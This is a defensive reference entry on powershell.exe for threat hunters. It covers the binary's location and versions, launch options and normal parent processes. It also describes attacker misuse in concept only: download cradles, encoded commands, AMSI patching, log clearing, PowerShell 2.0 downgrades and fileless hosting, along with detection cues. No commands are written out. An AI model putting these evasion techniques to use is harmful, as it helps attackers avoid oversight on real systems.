powershell.exe

Windows PowerShell is built on the .NET Framework and works by loading and running cmdlets, small .NET classes, alongside scripts written in the PowerShell language. The genuine binary lives at C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, with a 32-bit copy under SysWOW64. The v1.0 in that path is historical and has never changed: the in-box version on modern Windows is actually PowerShell 5.1. It is separate from PowerShell 7, whose binary is named pwsh.exe and installs under Program Files.

It can run interactively as a console or non-interactively from another program, taking a script file with -File, a literal command with -Command, or a base64-packed command with -EncodedCommand. Like any console program it is hosted by conhost.exe. Crucially, powershell.exe is only the default host. The PowerShell engine itself lives in System.Management.Automation.dll, and any .NET program can load that DLL to run PowerShell code without ever starting powershell.exe.

Its parent is whatever started it: an interactive explorer.exe session, a logon or Group Policy script, the Task Scheduler, a software installer, or a management agent. A wide range of parents is therefore normal in administered environments, which is part of why the process is hard to baseline on behavior alone.

powershell.exe is the premier living-off-the-land tool on Windows (T1059.001). The signed in-box binary gives attackers a trusted way to run code entirely in memory (T1620), pull payloads down with a download cradle (T1105), and hide intent behind base64 or otherwise obfuscated commands (T1027.010). Because the binary itself is legitimate, path and signature checks pass. The evidence is in the command line, the parent, and the network and file activity that follow.

PowerShell 5.1 added a deep logging surface: script block logging (event ID 4104), module logging, transcription, and live inspection of script content through AMSI. Attackers work to blind it (T1685) by patching AMSI in memory, disabling or clearing these logs, or downgrading to PowerShell 2.0, which predates all of them. Heavy use of -Version 2 is a tell.

Absence is not safety. Because the engine is just a DLL, attackers run PowerShell through their own .NET host, so-called unmanaged or fileless PowerShell, and powershell.exe never appears in the process tree. A quiet powershell.exe does not mean PowerShell was not used.